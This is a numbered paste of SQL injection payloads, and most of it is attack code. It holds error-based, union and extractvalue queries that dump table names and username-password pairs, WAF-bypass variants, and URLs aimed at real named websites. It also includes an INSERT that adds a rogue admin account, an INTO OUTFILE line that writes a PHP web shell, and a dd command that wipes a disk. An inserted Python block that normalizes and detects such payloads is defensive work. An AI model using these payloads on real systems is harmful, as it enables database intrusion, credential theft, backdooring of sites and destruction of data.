  607. and (select 1 from (select count(*),concat((select(select concat(cast(table_name as char),0x7e)) from information_schema.tables where table_schema=database() limit 19,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
  608.  
  609. Columns
  610.  
  611. 21 and (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0x73657474696e6773 limit 2,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
  612.  
  613. extract data
  614.  
  615. http://www.aliqbalschools.org/index.php… and (select 1 from (select count(*),concat((select(select concat(cast(concat(userName,0x7e,passWord) as char),0x7e)) from iqbal_iqbal.settings limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
  616.  
  617. Notice the limit function in the query
  618. A website can have more than two databases, so increase the limit until you find all database names
  619. Example: limit 0,1 or limit 1,1 or limit 2,1
  620. ===================================================================================================================================
  621. Differences:
  622. Error Based Query for Database Extraction:
  623. ===================================================================================================================================
  624. and (select 1 from (select count(*),concat((select(select concat(cast(database() as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
  625.  
  626. Double Query for Database Extraction:
  627.  
  628. and(select 1 from(select count(*),concat((select (select concat(0x7e,0×27,cast(database() as char),0×27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from
  629. information_schema.tables group by x)a) and 1=1
  630.  
  631. and(select 1 from(select count(*),concat((select (select (SELECT distinct
  632. concat(0x7e,0×27,cast(schema_name as char),0×27,0x7e) FROM information_schema.schemata LIMIT N,1)) from
  633. information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
  634.  
  635. and(select 1 from(select count(*),concat((select (select (SELECT distinct
  636. concat(0x7e,0×27,cast(table_name as char),0×27,0x7e) FROM information_schema.tables Where
  637. table_schema=0xhex_code_of_database_name LIMIT N,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from
  638. information_schema.tables group by x)a) and 1
  639. ===================================================================================================================================
  640. WUBI +and+extractvalue(rand(),concat(0x3e,(select+concat(username,0x7e,password)+from+iw_users+limit+0,1)))–+
  641. ===================================================================================================================================
  642.  
  643. Download any Linux live image, boot from it and format the disk with dd+urandom. After that, NOBODY can recover anything from it.
  644. Code: dd if=/dev/urandom of=/dev/sda bs=1M
  645.  
  646. I’d say using concat(0xY)
  647.  
  648. Y being ‘’ in hex
  649. union select concat(version,0x3c7363726970743e616c6572742827706833776c27293c2f7363726970743e)
  650.  
  651. http://zerocoolhf.altervista.org/level2.php…–+
  652.  
  653. union select 1,group_concat(column_name),3 FROM information_schema.columns WHERE table_name=concat(’0x’, hex(‘users’)
  654.  
  655. =113′+and+0+union+select+1,(SELECT (@) FROM (SELECT(@:=0×00),(SELECT (@) FROM (information_schema.columns) WHERE (table_schema>=@) AND (@)IN (@:=CONCAT(@,0x3C7363726970743E616C6572742827,’ [ ',table_schema,' ] >’,table_name,’ > ‘,column_name,0x27293B3C2F7363726970743E))))x),3–+–
  656.  
  657. Injection in SQL database: add new user
  658. INSERT INTO admins (`name`,`password`,`email`) VALUES (‘unix’,'unixunix’,'unix_chro@yahoo.com’)
  659.  
  660. +and+(select+1+from+(select+count(*),concat((select(select+concat(cast(table_nam e+as+char),0x7e))+from+information_schema.tables+where+table_schema=0xDATABASEHE X+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)
  661.  
  662. CHALLENGES
  663.  
  664. Code:
  665. =(13)and(0)union(select(1),group_concat(column_name,0x3c62723e),(3)from(information_schema.columns)where(table_schema=database())and(table_name=0×7365637572697479))–+-
  666. =12+and+false/*!union*/ /*!select*/1,group_concat(0x3c62723e,/*!TabLe_NaMe*/),2,concat(user(),0x2a,database(),0x2a,version()),13,0x3c666f6e7420636f6c6f723d626c75653e3c68323e706833776c,15 from information_schema.tables where table_schema=0x66616272697a696f5f636572697070 LiMit 0,1–
  667. =/*!uNiOn*/ /*!SeLeCt*/ 1,concat(/*!version(),0x3a,0x3a,AdMinLoGiN,0x3a,0x3a*/),3 /*!fRoM*/ security–
  668. =121)+and(0)+/*!uNion*/+/*!seleCt*/+1,2,3,4,version(),6,7– -
  669. =121)/**/and false UNION(SELECT 1,2,3,4,5,6,7)–+-
  670. =121 div 0 ) /*!UNION*/ /*!SELECT*/ 1,2,3,4,5,6,version()# |
  671. null’+union+select+1,2,count(schema_name),4,5+from+information_schema.schemata– x
  672. ===================================================================================================================================
  673. Error Based:
  674. ===================================================================================================================================
  675. +or+1+group+by+concat_ws(0x7e,version(),floor(rand(0)*2))+having+min(0)+or+1–
  676.  
  677. or 1 group by concat(0x3a,(select substr(group_concat(username,0x3a,password),1,150)
  678.  
  679. from rmdsz_user),floor(rand(0)*2)) having min(0) or 1– -
  680. or 1 group by concat_ws(0x7e,version(),floor(rand(0)*2)) having min(0) or 1 — -
  681.  
  682. and (select 1 from (select count(*),concat((select(select concat(cast(database() as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
  683.  
  684. +AND(SELECT COUNT(*) FROM (SELECT 1 UNION SELECT null UNION SELECT !1)x GROUP by CONCAT((SELECT version() FROM information_schema.tables LIMIT 0,1),FLOOR(RAND(0)*2)))
  685.  
  686. +and+(select+1+from+(select+count(*)+from+(select+1+union+select+2+union+select+ 3)x+group+by+concat(mid((select+concat_ws(0x7e,version(),0x7e)+from+information_ schema.tables+limit+0,1),1,25),floor(rand(0)*2)))a)– x
  687.  
  688. or 1=convert(int,(@@version))-
  689. +or+1+group+by+concat_ws(0x7e,version(),floor(rand(0)*2))+having+min(0)+or+1–
  690. +and+(select+1+from+(select+count(*),concat((select(select+concat(c ast(count(schema_name)+as+char),0x7e))+from+information_schema.schemata+limit+0, 1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)
  691.  
  692. (42)and(0)union(select(1),2,version(),4,5,0x3c623e3c666f6e7420636f6c6f723d626c75653e706833776c,7,8,9,(10))–+-
  693. ===================================================================================================================================
  694. WAF BYPASS BY TOTTI
  695. ===================================================================================================================================
  696.  
  697. =-2/*1337*/UNION/*1337*/(SELECT/*1337*/1337,concat_ws(0x203a20,0x746f7474693933,table_nam e)/*1337*/FROM/*1337*/INFORMATION_SCHEMA./*!TABLES*//*1337*/WHERE/*1337*/TABLE_SCHEMA=database())– -
  698.  
  699. =2+and(0)+union+distinctROW+select+1,/*!50000CoNcaT*/(0x706833776c,0x3a,table_name) /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=database()– -
  700.  
  701. ===================================================================================================================================
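A defender's view of the error-based and comment-obfuscated payload shapes listed above, as an added example that is not part of the original paste: a normalizer that undoes URL encoding, inline comments and case mixing before matching, so the obfuscation no longer hides the keywords. The rule names, sample query strings and the `id`/`q` parameters are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# MySQL executes the body of /*!...*/ and /*!50000...*/, so keep that body.
VERSIONED = re.compile(r"/\*!\d*(.*?)\*/", re.S)
# Plain /*...*/ comments only separate tokens, so they become a space.
COMMENT = re.compile(r"/\*.*?\*/", re.S)

def normalize(raw):
    """Undo URL encoding, inline comments, case mixing and spacing tricks."""
    text = unquote_plus(unquote_plus(raw))  # second pass catches double encoding
    text = VERSIONED.sub(r" \1 ", text)
    text = COMMENT.sub(" ", text)
    return re.sub(r"\s+", " ", text).lower().strip()

# Constructed rule set: every pattern in a rule must match the normalized text.
RULES = {
    "union_select": [r"\bunion\b[\s(]*(?:distinctrow|distinct|all)?[\s(]*select\b"],
    "dup_key_error": [r"floor\s*\(\s*rand\s*\([^)]*\)\s*\*\s*2\s*\)",
                      r"\bgroup\s+by\b"],
    "xpath_error": [r"\bextractvalue\s*\("],
    "schema_enum": [r"\binformation_schema\s*\.\s*(?:tables|columns|schemata)\b"],
}
COMPILED = {n: [re.compile(p) for p in pats] for n, pats in RULES.items()}

def classify(raw):
    """Return the sorted names of all rules that fire on one query string."""
    text = normalize(raw)
    return sorted(n for n, pats in COMPILED.items()
                  if all(p.search(text) for p in pats))

# Constructed sample query strings (parameter names are hypothetical).
SAMPLES = [
    "id=21+and+(select+1+from+(select+count(*),concat(version(),"
    "floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)",
    "id=-2/*1337*/UNION/*1337*/(SELECT/*1337*/1,table_name/*1337*/"
    "FROM/*1337*/INFORMATION_SCHEMA./*!TABLES*/)",
    "id=2+and(0)+/*!50000uNiOn*/+distinctROW+/*!SeLeCt*/+1,2",
    "id=7%2527%2Band%2Bextractvalue(rand(),concat(0x3e,version()))",
    "q=credit+union+selection+floor+plan+group+by+room",  # benign look-alike
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(classify(sample) or ["clean"], sample[:60])
```

Matching on normalized text is a log-triage aid; parameterized queries remain the fix for the injection itself.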
  702. WUBI – 1,(select(@x)from(select(@x:=0×00),(select(0)from(information_schema.columns)where(table_schema!=0×69)and(0×00)in(@x:=concat(@x,0x3c62723e,table_schema,0x2020203d3e3e202020,table_name,0x20203a3a3a32020,column_name))))x),3,4–
  703.  
  704. (select (@) from (select(@:=0×00),(select (@) from (information_schema.columns) where (table_schema>=@) and (@)in (@:=concat(@,0x0a,’ [ ',table_schema,' ] >’,table_name,’ > ‘,column_name))))x)
  705. (select (@) from (select (@x:=0×00),(select (@) from (database.table) where (@) in (@:=concat(@,0x0a,columns)))x)
  706.  
  707. (select (@) from (select (@x:=0×00),(select (@) from (database.table) where (@) in (@:=concat(@,0x0a,columns)))x)
  708. ===================================================================================================================================
  709.  
  710. +and+1=convert(int,SERVERPROPERTY(‘ProductVersion’))
  711. ===================================================================================================================================
  712.  
  713. http://zerofreak.blogspot.it/…/tutorial-by-zer0freak-zer0fr…
  714.  
  715. http://www.websec.ca/kb/sql_injection
  716.  
  717. http://www.hellboundhackers.org/…/862-mysql-injection-compl…
  718.  
  719. ===================================================================================================================================
  720. test
  721.  
  722. http://www.mt.ro/nou/articol.php?id=-angajari’+and+extractvalue(rand(),concat(0x3e,(select+concat(username,0x7e,password)+from+iw_users+limit+0,1)))–+
  723.  
  724. …………………………………..
  725. http://www.mt.ro/nou/articol.php?id=-angajari’ and (select 1 from (select count(*),concat((select(select concat(cast(table_name as char),0x7e)) from information_schema.tables where table_schema=0x64625f6d74 limit 10,1),floor(rand(0)*2))x from information_schema.tables group by x)a)–+
  726.  
  727. SELECT “ system($_REQUEST['cmd']); ?>”
  728. INTO OUTFILE “full/path/here/cmd.php”